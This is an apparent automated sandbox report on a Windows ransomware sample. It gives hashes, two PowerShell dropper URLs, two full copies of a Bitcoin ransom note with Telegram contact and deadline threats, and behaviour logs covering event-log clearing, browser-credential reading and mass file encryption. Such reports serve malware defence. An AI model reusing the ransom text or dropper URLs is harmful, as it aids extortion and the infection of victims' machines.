35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd

Analysis

max time kernel
147s
max time network
120s
platform
windows7_x64
resource
win7v200722
submitted
29-08-2020 10:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
Size

2.8MB
MD5

e5ee41b7ce337ff5cc3fd62ddec1567e
SHA1

29c6a8ee6f15a4ddac2d972a97fd87d94ee023a3
SHA256

35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd
SHA512

b3af77835c19ae788b80b8337ae3ea0fbeb38fc0df6d56ea9780bfb26837684da09f954f1f94357300e9ac729f0a501a44e61494929bef9b56586f4fa7430494

Score

10^/10

evasion ransomware spyware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://e-service.iag.bg/App_Themes/Efa/clear.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://e-service.iag.bg/App_Themes/Efa/video.mp4

Extracted

Path

C:\HELP_DECRYPT_YOUR_FILES.txt

Ransom Note

All of your important files encrypted with AES-256, RSA-2848 , is a powerful cryptography algorithm For more information you can use Wikipedia *attention: Don't rename or edit encrypted files because it will be impossible to decrypt your files This is a private ransomware developed by our team and there is no decryption file for it For Trust You can Send us Test Files And We Decrypt That And Send To You. *How do I contact you? The only way to communicate is through a secure Telegram messenger Telegram ID : https://t.me/HELP_DECRYPT_YOUR_FILES Your unique Id : MFKFVXVW How To Access Telegram To access Telegram, you must install the version related to your platform You can download Telegram from https://telegram.org #How to recover files? How files are decrypted? What is the decryption file like? Watch file Watch-me.mp4 on each drive and desktop You need two key 1-Public key: you need it for encryption 2-Private Key: you need it for decryption So you need Private key to recover your files. All of your network computers files is encrypted with one public key. So you need just one Private key to recover all computers files The private Key that we will send works on all your computers #How to use private Key? We send you a simple software with private Key And you just need run this software on each computer that encrypted and all affected files will be decrypted *What are the guarantees that I can decrypt my files after paying the ransom? Your main guarantee is the ability to decrypt test files. This means that we can decrypt all your files after paying the ransom. We have no reason to deceive you after receiving the ransom, because it harms our business You Have 24 hours to Decide to Pay after 48 hours Decryption Price will Be Double And after 72 hours it will be triple Try to Contact late and You will know Therefore, we recommend that you make payment within a few hours. #deadline You just have 72 hours to send us the Bitcoin after 72 hours we will remove your private key and it's impossible to recover your files #What is Bitcoin? Bitcoin is an innovative payment network and a new kind of money. You can create a Bitcoin account at https://blockchain.info/ and deposit some money into your account and then send to us #How to buy Bitcoin? There are Many way to buy Bitcoin and deposit it into your account, You can buy it with WesternUnion, Bank Wire, International Bank transfer, Cash deposit and etc https://localbitcoins.com ---> Buy Bitcoin with WesternUnion or MoneyGram https://coincafe.com ---> Buy Bitcoin fast and Secure with WesternUnion and Cash deposit https://www.bitstamp.net ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment httos://www.kraken.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://www.kraken.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://www.ccedk.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://bitcurex.com/ ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment If you want to pay with your Business bank account you should create a business account in exchangers they don't accept payment from third party

URLs

https://t.me/HELP_DECRYPT_YOUR_FILES

Extracted

Path

C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.html

Ransom Note

All of your important files encrypted with AES-256, RSA-2848 , is a powerful cryptography algorithm For more information you can use Wikipedia *attention: Don't rename or edit encrypted files because it will be impossible to decrypt your files This is a private ransomware developed by our team and there is no decryption file for it For Trust You can Send us Test Files And We Decrypt That And Send To You. *How do I contact you? The only way to communicate is through a secure Telegram messenger Telegram ID : https://t.me/HELP_DECRYPT_YOUR_FILES Your unique Id : MFKFVXVW How To Access Telegram To access Telegram, you must install the version related to your platform You can download Telegram from https://telegram.org #How to recover files? How files are decrypted? What is the decryption file like? Watch file Watch-me.mp4 on each drive and desktop You need two key 1-Public key: you need it for encryption 2-Private Key: you need it for decryption All of your network computers files is encrypted with one public key. So you need just one Private key to recover all computers files The private Key that we will send works on all your computers #How to use private Key? We send you a simple software with private Key And you just need run this software on each computer that encrypted and all affected files will be decrypted *What are the guarantees that I can decrypt my files after paying the ransom? Your main guarantee is the ability to decrypt test files. This means that we can decrypt all your files after paying the ransom. We have no reason to deceive you after receiving the ransom, because it harms our business You Have 24 hours to Decide to Pay after 48 hours Decryption Price will Be Double And after 72 hours it will be triple Try to Contact late and You will know Therefore, we recommend that you make payment within a few hours. #deadline You just have 72 hours to send us the Bitcoin after 72 hours we will remove your private key and it's impossible to recover your files #What is Bitcoin? Bitcoin is an innovative payment network and a new kind of money. You can create a Bitcoin account at https://blockchain.info/ and deposit some money into your account and then send to us #How to buy Bitcoin? There are Many way to buy Bitcoin and deposit it into your account, You can buy it with WesternUnion, Bank Wire, International Bank transfer, Cash deposit and etc https://localbitcoins.com ---> Buy Bitcoin with WesternUnion or MoneyGram https://coincafe.com ---> Buy Bitcoin fast and Secure with WesternUnion and Cash deposit https://www.bitstamp.net ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment httos://www.kraken.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://www.kraken.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://www.ccedk.com ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment https://bitcurex.com/ ---> Buy Bitcoin with bank wire, International bank transfer, SEPA payment If you want to pay with your Business bank account you should create a business account in exchangers they don't accept payment from third party

URLs

https://t.me/HELP_DECRYPT_YOUR_FILES

Signatures

Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

5 1496 powershell.exe
7 1112 powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
5	1496	powershell.exe
7	1112	powershell.exe

Drops file in Program Files directory 64 IoCs

Processes:

35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe

description	ioc	process
File created	C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.JPG.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Broken_Hill.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR40F.GIF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_left_over.gif.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\AdjacencyLetter.dotx.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jre7\bin\jp2ssv.dll.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238983.WMF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsColorChart.html.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\SegoeChess.ttf.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14866_.GIF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18180_.WMF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PICCAP98.POC.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lord_Howe.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197979.WMF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_over.gif.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\SPACER.GIF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\AD.XML.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime\TAB_ON.GIF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Teal.css.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR2F.GIF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\DVD Maker\SecretST.TTF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01152_.WMF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_postage_Thumbnail.bmp.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185806.WMF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14581_.GIF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop_PAL.wmv.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\nio.dll.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PS10TARG.POC.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\7-Zip\Lang\sq.txt.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jre7\bin\installer.dll.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090783.WMF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0251301.WMF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\CERTINTL.DLL.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSTH7EN.DLL.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jre7\bin\dt_socket.dll.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01759_.WMF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15171_.GIF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14595_.GIF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana\TAB_ON.GIF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185774.WMF.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css.Id-MFKFVXVW.secure	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1860 taskkill.exe
316 taskkill.exe
1280 taskkill.exe

pid	process
1860	taskkill.exe
316	taskkill.exe
1280	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 30 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\User Preferences	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\User Preferences\88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977 = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002fffd735fdb36344815d3cd8a589ddc00000000002000000000010660000000100002000000098a8e69254b1e46bd3ea51b658352d1455f4746201a252d10869da4ab7230702000000000e8000000002000020000000a0ec6e2eb45a9a05777901e79ec9708ef385e6a830b79606dabe18810bf84bcf5000000032a833fe92d58d193ce62895997b27024b97fab9cb5c31b35b70eb54f459e65f3a60b454e2bd2c16966d8bf885786bb0df89d42216f85c6a08cbb4db46d6dabc75823a1613a8725adb7279708efd64304000000004d0c2f2c7fe724c1f4f1cf8113503031e8c58ad1a70e05f4081746f377422a643fda3c3bc7341c69f5794dd0135c2b5d30e70190ffb7a02b7742aea2f9cf456	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{297F8541-E9F4-11EA-BB0B-C2BBDBDFBF59} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\User Preferences\2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81 = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002fffd735fdb36344815d3cd8a589ddc000000000020000000000106600000001000020000000c4192a8b0f9cec901e373137a375e10270260a8abc3b82b3ad7a2fac4132c91b000000000e80000000020000200000004d55436bbe6088642adc3a6bf37cb76d8bd8dcf774095b91ad239146cf3cff1e10000000541987af08815717167a588ab0d97c8440000000458c97e7e19a0d453ab3cc93891acbc3af0702f6cc5b148e17a88bda788d9d37b3d70445d5df5d51b5b1a014a6072a0c32b0e7f15f4c1e19f4f170f86eaf9a4d	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe

Modifies registry class 3 IoCs

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.secure\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.secure	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.secure\DefaultIcon\ = "C:\\Windows\\System32\\SHELL32.dll,271"	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1900 NOTEPAD.EXE
Runs net.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1496 powershell.exe
1112 powershell.exe
1856 powershell.exe
1028 powershell.exe
1852 powershell.exe

pid	process
1900	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1496	powershell.exe
1496	powershell.exe
1112	powershell.exe
1112	powershell.exe
1856	powershell.exe
1856	powershell.exe
1028	powershell.exe
1028	powershell.exe
1852	powershell.exe
1852	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	1860	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	1280	taskkill.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeSecurityPrivilege	1524	wevtutil.exe
Token: SeBackupPrivilege	1524	wevtutil.exe
Token: SeSecurityPrivilege	1488	wevtutil.exe
Token: SeBackupPrivilege	1488	wevtutil.exe
Token: SeSecurityPrivilege	1784	wevtutil.exe
Token: SeBackupPrivilege	1784	wevtutil.exe
Token: SeSecurityPrivilege	1468	wevtutil.exe
Token: SeBackupPrivilege	1468	wevtutil.exe
Token: SeSecurityPrivilege	1212	wevtutil.exe
Token: SeBackupPrivilege	1212	wevtutil.exe
Token: SeSecurityPrivilege	1436	wevtutil.exe
Token: SeBackupPrivilege	1436	wevtutil.exe
Token: SeSecurityPrivilege	1928	wevtutil.exe
Token: SeBackupPrivilege	1928	wevtutil.exe
Token: SeSecurityPrivilege	1988	wevtutil.exe
Token: SeBackupPrivilege	1988	wevtutil.exe
Token: SeSecurityPrivilege	1992	wevtutil.exe
Token: SeBackupPrivilege	1992	wevtutil.exe
Token: SeSecurityPrivilege	268	wevtutil.exe
Token: SeBackupPrivilege	268	wevtutil.exe
Token: SeSecurityPrivilege	908	wevtutil.exe
Token: SeBackupPrivilege	908	wevtutil.exe
Token: SeSecurityPrivilege	956	wevtutil.exe
Token: SeBackupPrivilege	956	wevtutil.exe
Token: SeSecurityPrivilege	940	wevtutil.exe
Token: SeBackupPrivilege	940	wevtutil.exe
